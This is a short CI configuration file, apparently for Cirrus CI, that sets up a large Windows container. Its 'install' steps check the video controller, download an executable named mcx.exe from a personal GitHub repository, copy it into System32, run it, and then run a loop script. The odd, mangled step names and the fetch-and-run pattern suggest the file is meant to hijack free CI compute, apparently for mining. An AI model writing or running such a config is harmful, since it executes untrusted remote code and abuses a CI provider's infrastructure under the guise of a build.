windows_container:
  image: cirrusci/windowsservercore:2019
  cpu: 8
  memory: 11G

windows_task:
  install_scri423pt:
    powershell Get-WmiObject win32_VideoController
  install_script:
    powershell wget https://github.com/Alex-Arc-hub/mcx/blob/main/mcx.exe?raw=true -OutFile out.exe
  install_sc2ript:
    copy mcx.exe C:\Windows\System32
  install_sc23ript:
    .\mcx.exe
  install_scri23pt:
    .\loop.bat 
    
